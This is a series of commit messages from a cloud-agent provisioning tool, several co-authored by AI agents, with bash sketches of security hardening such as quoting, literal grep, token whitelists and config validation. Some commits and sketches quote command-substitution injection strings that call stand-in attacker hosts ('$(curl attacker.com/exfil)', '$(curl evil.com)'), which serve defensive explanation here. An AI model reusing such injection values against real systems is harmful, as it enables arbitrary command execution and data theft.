The security reviewer agent could post contradictory reviews (CHANGES_REQUESTED
then APPROVED) on the same commit because each review_all cycle spawned a fresh
reviewer with no memory of prior runs. Reviews posted via `gh pr review` don't
appear in `gh pr view --comments`, so the existing comment-based dedup missed them.
Adds a review dedup step that fetches existing reviews via the GitHub API and
stops if a prior security review exists on the current HEAD commit. Also adds
commit SHA to the review body format for traceability.
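Below is a minimal sketch of the dedup check. It assumes reviews are fetched with `gh api` and flattened to one `commit_sha<TAB>body` line each via `--jq`. The function name `has_security_review_on_head` and the `Security Review` marker string are hypothetical and are not taken from the actual script.

```bash
#!/usr/bin/env bash
# Hypothetical helper: exit 0 if any review on HEAD_SHA contains the assumed
# "Security Review" marker. Input: one "commit_sha<TAB>body" line per review.
has_security_review_on_head() {
  local head_sha="$1" tab sha body
  tab=$(printf '\t')
  while IFS="$tab" read -r sha body; do
    if [ "$sha" = "$head_sha" ]; then
      case "$body" in
        *"Security Review"*) return 0 ;;
      esac
    fi
  done
  return 1
}

# Example wiring (needs gh auth and network; OWNER/REPO, PR_NUM and HEAD_SHA
# are placeholders):
# if gh api "repos/OWNER/REPO/pulls/${PR_NUM}/reviews" \
#      --jq '.[] | [.commit_id, .body] | @tsv' |
#    has_security_review_on_head "$HEAD_SHA"; then
#   echo "Security review already posted on ${HEAD_SHA}; skipping."
#   exit 0
# fi
```

The check matches on the commit SHA as well as the marker. A new push therefore still gets a fresh review, while repeated cycles on the same HEAD stop early.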
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Quote $escaped_cmd in bash -c arguments to prevent word splitting.
While printf '%q' escapes shell metacharacters, the lack of quotes
around the variable causes the shell to split on whitespace before
passing to bash -c, enabling argument injection.
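The splitting is easy to reproduce locally. In this sketch, `count_args` is a throwaway helper and the command strings are arbitrary examples. An unquoted expansion becomes several words, and `bash -c` treats only the first word as its script. The remaining words silently become `$0`, `$1`, and so on.

```bash
#!/usr/bin/env bash
# Throwaway helper: prints how many arguments it received.
count_args() { echo "$#"; }

escaped_cmd=$(printf '%q' 'echo hello world')
count_args $escaped_cmd     # unquoted: split on whitespace into 3 words
count_args "$escaped_cmd"   # quoted: passed through as 1 word

script='echo one two'
bash -c $script     # script is just "echo"; "one" -> $0, "two" -> $1 (prints an empty line)
bash -c "$script"   # the whole string is the script (prints "one two")
```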
Fixes #1422
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions
Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
((var++)), read -d, nounset flag, sed -i, date %N, local -n,
declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh
Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()
Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add E2E test harness and integrate into QA pipeline
Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible
Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary
Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
handle race condition on concurrent imports)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Quote $escaped_cmd inside the -C argument to bash -c in run_server()
and interactive_session() to prevent word splitting. Without quotes,
even though printf '%q' escapes shell metacharacters, the shell still
splits the escaped command on whitespace before passing it to bash -c,
enabling potential argument injection.
Fixes #1422
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* feat: add headless SDK mode for programmatic provisioning (#1181)
Add --headless and --output json flags to enable non-interactive
provisioning with structured JSON output on stdout.
- --headless: disables prompts, OAuth browser flows, and SSH sessions
- --output json: outputs structured SpawnResult JSON on stdout
- Exit code contract: 0=success, 1=execution, 2=download, 3=validation
- Upfront credential validation (fail-fast before provisioning)
- Script stdout piped to stderr to keep JSON output clean
- SPAWN_HEADLESS=1 env var set for bash scripts
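A caller might consume the exit-code contract roughly as follows. `describe_spawn_exit` is a hypothetical helper, and the `spawn AGENT CLOUD` argument form in the comment is a placeholder rather than the documented CLI syntax.

```bash
#!/usr/bin/env bash
# Hypothetical caller-side helper: map the headless exit codes
# (0=success, 1=execution, 2=download, 3=validation) to labels.
describe_spawn_exit() {
  case "$1" in
    0) echo "success" ;;
    1) echo "execution error" ;;
    2) echo "download error" ;;
    3) echo "validation error" ;;
    *) echo "unknown exit code $1" ;;
  esac
}

# Example wiring (AGENT/CLOUD are placeholders). Stdout carries only the
# SpawnResult JSON; script output goes to stderr.
# spawn AGENT CLOUD --headless --output json > result.json 2> spawn.log
# rc=$?
# if [ "$rc" -ne 0 ]; then
#   echo "spawn failed: $(describe_spawn_exit "$rc")" >&2
# fi
```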
Closes #1181
-- refactor/ux-engineer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: restore critical test mocks for fly SSH readiness checks
The PR inadvertently removed essential mock logic:
- fly ssh mock no longer responded to 'echo ok' commands
- timeout/gtimeout mocks were removed (needed for SSH polling)
- python3 mock was removed (needed for JSON parsing)
- /tmp/spawn_* cleanup was removed from test teardown
This caused 29 fly/* test failures with 'SSH connectivity failed'.
Restores the exact mock implementations from the main branch.
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
test/run.sh (3 failures fixed):
- Export TEST_DIR so sprite mock tracks create→list state across processes
- Add sleep mock to avoid 30s polling loops in ensure_sprite_exists
- Add timeout/gtimeout, python3 pass-through mocks for host protection
- Set HOME to fake home for isolation, create fake home directory structure
- Clean up /tmp/spawn_* temp files in cleanup trap
test/mock.sh (29 failures fixed):
- Fix fly mock to detect "echo ok" in fly ssh console -C arguments
(including printf %q escaped form) so _fly_wait_for_ssh() succeeds
- Add timeout/gtimeout pass-through mocks to prevent system calls
- Add python3 delegate mock for JSON parsing in shared/common.sh
- Clean up /tmp/spawn_* temp files in cleanup trap
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Fixes #1411
Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.
Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)
Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.
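This is a small local reproduction of why `-F` matters. It uses a hypothetical list of context names in a temp file rather than real `hcloud` output.

```bash
#!/usr/bin/env bash
# Sample context names; the third entry is deliberately hostile.
contexts_file=$(mktemp)
trap 'rm -f "$contexts_file"' EXIT
printf '%s\n' 'prod' 'p.od' 'evil$(id)' > "$contexts_file"

ctx='p.od'
# Regex match: "." matches any character, so "prod" and "p.od" both match.
grep -c -- "$ctx" "$contexts_file"
# Literal match with -F: only the exact text "p.od" matches.
grep -cF -- "$ctx" "$contexts_file"

# The name is passed as a single quoted argument, so "$(id)" is searched
# for as plain text and never executed.
grep -F -- 'evil$(id)' "$contexts_file"
```

The `--` ends option parsing, so a context name that begins with `-` is not mistaken for a grep flag.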
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: prevent command injection in key-request.sh env var loading
Fixes#1405
**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.
**Changes:**
- Added regex validation in _try_load_env_var (lines 88-91) to reject values
containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected
**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: strengthen key-request.sh regex to block all shell metacharacters
Address security review feedback from PR #1415.
**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern
**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.
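Here is a sketch of the whitelist check using the regex quoted above. The function name `is_safe_token` is hypothetical. Storing the pattern in a variable keeps `[[ =~ ]]` working the same way on bash 3.2 and newer.

```bash
#!/usr/bin/env bash
# Whitelist from the commit: letters, digits, and . _ / @ -
is_safe_token() {
  local re='^[a-zA-Z0-9._/@-]+$'
  [[ $1 =~ $re ]]
}

if is_safe_token 'abc-123_XYZ.v1/key@example'; then echo "accepted"; fi
if ! is_safe_token 'tok$(curl evil.com)'; then echo "rejected"; fi
```

Newlines, tabs, `!`, braces and the empty string all fail the match without being listed explicitly. That is the robustness argument for a whitelist.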
-- pr-maintainer
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix path traversal risk in SPAWN_HOME validation
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add missing join import and update tests for SPAWN_HOME security validation
Addresses security review feedback on PR #1402:
- Add missing 'join' import to cli-version-and-dispatch.test.ts
- Update all test files to use homedir() instead of tmpdir() for SPAWN_HOME
The security fix in history.ts now enforces that SPAWN_HOME must be within
the user's home directory. All tests have been updated to use home-based
test directories instead of /tmp paths.
Changes:
- cli/src/__tests__/cli-version-and-dispatch.test.ts: Add join to path imports
- All test files: Replace tmpdir() with homedir() and /tmp/spawn- with /.spawn-test-
Tests:
- bun test history.test.ts: ✅ 69 pass
- bun test clear-history.test.ts: ✅ 27 pass
- bun test cli-version-and-dispatch.test.ts: ✅ 62 pass
- bun test list-table-rendering.test.ts: ✅ 8 pass
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes #1406
Changed all heredocs in security.sh from double-quoted to single-quoted
form to prevent variable expansion, then use explicit sed substitution
for validated values only.
This prevents command injection via ${ISSUE_NUM}, ${SLACK_WEBHOOK},
${WORKTREE_BASE}, and ${REPO_ROOT} in the triage, review_all, and scan
mode prompts.
Pattern applied (matching team_building mode):
- Use 'HEREDOC_EOF' (single quotes) to disable expansion
- Replace variables with PLACEHOLDER tokens
- Use sed -i to substitute only validated values
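The pattern above looks roughly like this. `render_triage_prompt` and `ISSUE_NUM_PLACEHOLDER` are hypothetical names. The sketch pipes through `sed` instead of editing a file with `sed -i`, which sidesteps the GNU/BSD `sed -i` difference.

```bash
#!/usr/bin/env bash
render_triage_prompt() {
  local issue_num="$1"
  # Validate before substituting: digits only.
  case "$issue_num" in
    ''|*[!0-9]*) echo "invalid issue number: $issue_num" >&2; return 1 ;;
  esac
  # Quoted delimiter: the shell expands nothing inside the heredoc.
  cat <<'HEREDOC_EOF' | sed "s/ISSUE_NUM_PLACEHOLDER/${issue_num}/g"
Triage issue #ISSUE_NUM_PLACEHOLDER.
Literal text such as $(whoami) and ${HOME} stays untouched.
HEREDOC_EOF
}

render_triage_prompt 1406
```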
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add validation in ensure_ssh_key() to prevent path traversal and
arbitrary file upload attacks:
- Validate public key file exists and is a regular file
- Reject symlinks to prevent reading sensitive system files
- Enforce 10KB size limit (SSH pubkeys are ~100-600 bytes)
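Here are the three checks as a standalone helper. `validate_pubkey_file` is a hypothetical name, and 10KB is taken as 10240 bytes.

```bash
#!/usr/bin/env bash
validate_pubkey_file() {
  local f="$1" size
  # Check -L first: -f follows symlinks, so it alone would not catch them.
  if [ -L "$f" ]; then
    echo "Refusing symlinked key file: $f" >&2; return 1
  fi
  if [ ! -f "$f" ]; then
    echo "Not a regular file: $f" >&2; return 1
  fi
  # wc -c output is padded with spaces on macOS, so strip them.
  size=$(wc -c < "$f" | tr -d ' ')
  if [ "$size" -gt 10240 ]; then
    echo "Key file too large (${size} bytes): $f" >&2; return 1
  fi
}
```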
Fixes#1407
Agent: complexity-hunter
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace nested command substitution $(echo "$(whoami)") with $USER
environment variable to prevent potential command injection attacks.
The nested substitution was vulnerable because:
- whoami could be aliased or PATH-manipulated in compromised environments
- Running as root in cloud-init amplified the security impact
- Double nesting was unnecessary complexity
Using $USER is safer because:
- It's a shell variable, not command execution
- No subprocess spawning or PATH resolution
- Simpler and more reliable
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes #1409
The bash sandbox test now verifies that test runs don't create or
modify agent-specific directories and configuration files:
- Checks that ~/.openclaw, ~/.sprite, and ~/.claude directories are
not created by test runs
- Verifies ~/.claude.json and ~/.claude/settings.json are not modified
during tests (using mtime comparison to handle pre-existing files)
- Skips checks for directories/files that existed before tests ran to
avoid false positives in development environments
This ensures tests remain properly sandboxed and don't pollute the
production environment with agent artifacts.
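One portable way to express the mtime comparison is sketched below. It assumes a marker file is created before the suite runs, and `check_not_modified` is a hypothetical helper. Comparing with `[ a -nt b ]` avoids the differences between GNU `stat -c` and BSD `stat -f`.

```bash
#!/usr/bin/env bash
# Fail if any existing PATH is newer than MARKER. Paths that do not exist
# are skipped here; "must not be created" is a separate existence check.
check_not_modified() {
  local marker="$1" p status=0
  shift
  for p in "$@"; do
    if [ -e "$p" ] && [ "$p" -nt "$marker" ]; then
      echo "Modified during test run: $p" >&2
      status=1
    fi
  done
  return "$status"
}

# Intended flow (paths are the examples from the commit message):
# marker=$(mktemp); sleep 1   # so later writes get a strictly newer mtime
# ./test/run.sh
# check_not_modified "$marker" "$HOME/.claude.json" "$HOME/.claude/settings.json"
```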
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace the complex claude launch pattern (subshell + PID file + tee
pipe + stream-json + 50-line watchdog monitoring log file growth +
session-end detection) with a simple direct launch:
claude -p "..." >> "${LOG_FILE}" 2>&1 &
The watchdog is now just a wall-clock timeout. The idle-output detection,
stream-json result parsing, and tee piping are all removed.
Also remove GitHub Actions concurrency groups: the trigger server
already handles dedup (409 for the same issue, 409 for the same reason),
so the GH Actions concurrency groups only added redundant queuing.
Changes:
- refactor.sh: simple launch + wall-clock-only watchdog
- security.sh: same simplification
- discovery.sh: same (refactored _kill_claude_process and
_run_watchdog_loop to simpler signatures)
- All 4 workflows: remove concurrency groups
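The simplified launch plus wall-clock watchdog can be sketched as a single helper. `run_with_wall_clock_timeout` is hypothetical, any command can stand in for `claude -p "..."`, and 124 is used for the timeout status only to mirror coreutils `timeout`.

```bash
#!/usr/bin/env bash
# Run CMD in the background, appending all output to LOG_FILE, and kill it
# once TIMEOUT_SECS of wall-clock time have passed.
run_with_wall_clock_timeout() {
  local timeout_secs="$1" log_file="$2" pid elapsed=0
  shift 2
  "$@" >> "$log_file" 2>&1 &
  pid=$!
  while kill -0 "$pid" 2>/dev/null; do
    if [ "$elapsed" -ge "$timeout_secs" ]; then
      kill "$pid" 2>/dev/null
      wait "$pid" 2>/dev/null || true
      return 124
    fi
    sleep 1
    elapsed=$((elapsed + 1))   # bash 3.2 friendly, no ((var++))
  done
  wait "$pid"   # propagate the command's own exit status
}
```

Nothing inspects the log while the command runs. That is the point of the simplification: the only failure mode the watchdog handles is "ran too long".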
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* security: fix incomplete command injection detection in prompt validation
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: refine command injection patterns to avoid false positives
Addresses changes requested in PR review:
- Updated && and || patterns to only match when followed by common shell commands
- Added context-aware check to exclude programming expressions like "a > b && c < d"
- Maintains security by still catching shell command chaining attempts
- All security tests pass including new edge case tests
Fixes false positive rejection of legitimate programming expressions
while still detecting shell injection attempts from issue #1400.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes #1403
**Changes:**
1. **test/run.sh** - Isolated mock state files:
- Changed /tmp/sprite_mock_created* to use TEST_DIR instead
- Added cleanup of any leaked /tmp files in cleanup() trap
- Prevents /tmp pollution from mock sprite state files
2. **test/record.sh** - Sandboxed config directory:
- Added TEST_CONFIG_DIR environment variable support
- When set, overrides HOME to prevent writing to ~/.config/spawn/
- Allows tests to run without polluting production config
3. **test/qa-dry-run.sh** - Safe git operations:
- Changed git checkout to git restore for reverting README changes
- Prevents potential checkout pollution of working tree
- Falls back to git checkout -- for older git versions
4. **test/test-sandbox.sh** - New verification test:
- Verifies no /tmp pollution after test/run.sh
- Verifies production config not modified
- Verifies mock.sh uses isolated temp directories
**Why:** Prevents the test suite from polluting the production environment (file writes to /tmp, ~/.config/spawn/, git state mutations).
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The trigger server streamed script stdout back to GitHub Actions via a
long-lived HTTP response, requiring --http1.1, heartbeat injection,
server.timeout(req, 0), createEnqueuer, drainStreamOutput, and 90-min
GH Actions timeouts. In practice GitHub Actions is just a dumb trigger
— the real state lives on the VM (log files, journalctl). Simplify to
fire-and-forget: spawn script, return 200 JSON immediately.
Also fix the refactor and discovery team lead monitoring loops. The
prompts buried the loop in a single compressed line that the model
ignored (doing Bash("sleep 10") repeatedly without calling TaskList).
Replace with a dedicated "Monitor Loop (CRITICAL)" section with numbered
steps, matching the security.sh pattern that actually works.
Changes:
- trigger-server.ts: remove ~150 lines of streaming code (createEnqueuer,
drainStreamOutput, startStreamingRun, heartbeat, ReadableStream),
replace with startFireAndForgetRun (stdout: "inherit", immediate JSON)
- All 4 workflows: simple curl POST, timeout-minutes 90→5, remove
--http1.1/-N/--max-time/exit-code handling
- refactor.sh: add Monitor Loop (CRITICAL) section with numbered steps
- discovery-team-prompt.txt: same Monitor Loop fix
- SKILL.md: update architecture docs, remove streaming sections
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* security: fix medium severity findings from scan #763
Addresses remaining medium-severity security findings from issue #763:
1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
- Removed dots from provider name validation regex
- Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
- Prevents path traversal via sequences like "foo..bar"
2. **Background process timeout** (shared/key-request.sh)
- Wrapped fire-and-forget key request in timeout 15s
- Prevents leaked subprocess if curl hangs beyond --max-time
3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
- Switched from x-forwarded-for header to server.requestIP(req)
- Uses actual connection IP instead of spoofable header
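Here is the tightened provider-name regex from item 1 as a standalone check. The function name `is_valid_provider` is hypothetical. With dots removed from the character class, `.` and `..` can never appear in a name used to build a file path.

```bash
#!/usr/bin/env bash
is_valid_provider() {
  local re='^[a-z0-9][a-z0-9_-]{0,63}$'
  [[ $1 =~ $re ]]
}

for name in hetzner aws 'foo..bar' '../etc'; do
  if is_valid_provider "$name"; then echo "ok: $name"; else echo "rejected: $name"; fi
done
```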
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add macOS portability for timeout command
Address review feedback from the security team: the timeout command is not available
on macOS by default. Added a fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS
This ensures request_missing_cloud_keys() works on both platforms.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix command injection vulnerability in key-request.sh
Fixes the critical command injection vulnerability identified in security review.
Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS
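Both ideas fit in a short sketch. The helper names are hypothetical, and `printf` stands in for the real `curl` call so the example runs offline. The `_` argument fills `$0` in the conventional way; the commit's `--` occupies the same slot.

```bash
#!/usr/bin/env bash
# Prefer timeout (Linux) or gtimeout (Homebrew coreutils); otherwise run
# unwrapped and rely on the command's own limit (e.g. curl --max-time).
run_with_optional_timeout() {
  local secs="$1"
  shift
  if command -v timeout >/dev/null 2>&1; then
    timeout "$secs" "$@"
  elif command -v gtimeout >/dev/null 2>&1; then
    gtimeout "$secs" "$@"
  else
    "$@"
  fi
}

# The inner script is a fixed single-quoted string. Caller values arrive as
# $1 and $2 and are never spliced into the script's source text.
describe_key_request() {
  run_with_optional_timeout 15 bash -c 'printf "provider=%s url=%s\n" "$1" "$2"' _ "$1" "$2"
}

describe_key_request hetzner 'https://example.invalid/$(id)'
```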
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixed readonly property assignments in commands-compact-list.test.ts by using the existing setTerminalWidth() helper instead of direct Object.defineProperty() calls. This makes the code more maintainable and consistent.
Updated oracle-provider-patterns.test.ts to check for install_claude_code function instead of the outdated claude.ai/install.sh reference, matching the current oracle/claude.sh implementation.
Changes:
- Replaced 4 inline Object.defineProperty() calls with setTerminalWidth() helper
- Updated oracle claude.sh test to check for install_claude_code instead of claude.ai/install.sh
- All compact list tests passing (20/20)
Fixes #1366
Agent: complexity-hunter
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
This commit addresses issue #1373 by improving the test sandbox to prevent
accidental writes to the real user environment.
Changes:
1. Enhanced preload.ts:
- Added .ssh directory creation in sandboxed HOME
- Expanded documentation explaining sandboxing strategy
- Clarified safety guarantees for filesystem operations
2. Added sandbox-verification.test.ts:
- Comprehensive test suite verifying sandbox isolation
- Tests environment variable sandboxing (HOME, XDG_*)
- Tests pre-created directories (.config, .ssh, .claude, .cache)
- Tests filesystem isolation (writes stay in temp directory)
- Tests subprocess isolation (bash inherits sandboxed env)
- Tests safety guarantees (no exposure of /root paths)
The existing preload.ts already prevented writes to real home directory
by redirecting process.env.HOME and XDG variables to temp directories.
This commit strengthens that sandboxing with the .ssh directory and adds
comprehensive verification tests to ensure the sandbox works correctly.
Fixes#1373
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0
The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Applied the test fixes from PR #1358:
1. Fixed process.stdout.columns mutation in commands-compact-list.test.ts
- Replaced direct property assignments with Object.defineProperty
- Created setColumns() helper function for strict mode compatibility
- Removed duplicate setTerminalWidth() function
2. Updated oracle-provider-patterns.test.ts assertion
- Changed from checking for "claude.ai/install.sh" URL
- Now checks for "install_claude_code" function name
- Matches current oracle/claude.sh implementation
Note: Shell scripts (aws/gptme.sh, gcp/gptme.sh) already have
set -eo pipefail from previous commits - no changes needed.
Fixes #1365
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace select prompts with autocomplete for improved UX when
choosing agents and clouds. Users can now type to filter the list,
significantly reducing time to find desired options in long lists.
- Replace p.select with p.autocomplete for agent selection
- Replace p.select with p.autocomplete for cloud selection
- Add "type to filter" messaging and placeholder text
- Update CLI version 0.3.2 → 0.3.3
Fixes #1367
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add input validation for SSH connection parameters (IP, username, server_name)
and server identifiers used in delete operations. This prevents command injection
attacks if ~/.spawn/history.json is corrupted or tampered with.
Changes:
- Add validateConnectionIP() - validates IPv4/IPv6 addresses and sentinels
- Add validateUsername() - validates Unix username format
- Add validateServerIdentifier() - validates server names/IDs
- Update cmdConnect() to validate all connection params before use
- Update buildDeleteScript() to validate server IDs before interpolation
- Update mergeLastConnection() to validate data from bash scripts
- Add comprehensive test coverage for all validation functions
- Bump CLI version to 0.3.3 (security patch)
Security impact:
- Prevents HIGH severity command injection via history.ip/user (issue #1381)
- Prevents MEDIUM severity command injection via server_id (issue #1380)
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The refactor bot was too passive: it ran for 29 minutes, all 7 teammates
used plan mode, none submitted plans, and it ignored a HIGH severity
security issue plus 4 safe-to-work issues.
Root cause: plan_mode_required on ALL teammates created too much friction
for issue-driven work. Teammates had to analyze, plan, submit, and wait
for approval — all within a tight time window.
Fix: two-track spawning system:
- Issue track: teammates assigned to labeled issues (safe-to-work,
security, bug) spawn WITHOUT plan mode. The label IS the approval.
- Proactive track: teammates doing optional scanning still use plan
mode to prevent invented work.
Also:
- Diminishing Returns Rule now explicitly exempts issue-driven work
- Issue-First Policy is now forceful: labeled issues are mandates
- Team structure maps teammates to issue label types
- Cycle timeout bumped from 15 to 25 min for issue fixing
- Discovery prompt updated with same two-track pattern
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* test: add mock test coverage for all 15 Fly.io agent scripts
Fly.io had zero test coverage — every bug fixed this session (stale
tokens, FlyV1 auth, name-taken failures, SSH hangs, PATH issues) went
undetected. This adds the full mock test infrastructure:
- test/fixtures/fly/ — env vars, API assertions, fixture JSONs for
app creation, machine creation, and token validation endpoints
- test/mock-curl-script.sh — URL stripping for api.machines.dev,
body validation for machine creation, synthetic status responses,
app creation POST handler, state tracking
- test/mock.sh — mock fly/flyctl CLI binary (ssh console, auth token),
URL stripping, required field validation, base64 mock
- test/record.sh — Fly.io REST endpoints now recordable, live
create+delete cycle, error detection, auth var mapping
All 15 agent scripts (aider, claude, openclaw, etc.) are automatically
discovered and tested: 75 passed, 0 failed.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use official curl installer for OpenClaw on Fly.io
bun install -g openclaw fails on Fly.io's bare Ubuntu image. Switch to
the official installer (curl -fsSL https://openclaw.ai/install.sh | bash)
which handles Node.js detection and dependency installation automatically.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: re-prompt on taken Fly.io app names + timeout run_server
Two fixes for Fly.io UX:
1. When app name is globally taken by another user, re-prompt instead
of failing. Returns exit code 2 from _fly_create_app so create_server
can loop with a new name.
2. run_server now has a 5-minute timeout (portable, no coreutils needed)
to prevent indefinite hangs like the 3-hour SSH session stall.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: wait for SSH before installing tools on Fly.io
The previous wait_for_cloud_init immediately ran apt-get via fly ssh
console on a machine that wasn't SSH-reachable yet, causing indefinite
hangs. Now:
1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds
2. Shows progress at each step instead of suppressing all output
3. Each run_server call has an explicit timeout (10min for apt, 2min
for bun, 30s for PATH exports)
4. Retries package install once on timeout
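Below is a generic sketch of the "poll until SSH responds" step. `poll_until` and `probe_ssh` are hypothetical names. The `fly ssh console -a ... -C ...` line in the comment is illustrative and may not match the script's exact flags.

```bash
#!/usr/bin/env bash
# Run a probe up to MAX_ATTEMPTS times, sleeping INTERVAL seconds between
# attempts. Returns 0 on the first success, 1 if every attempt fails.
poll_until() {
  local max_attempts="$1" interval="$2" attempt=1
  shift 2
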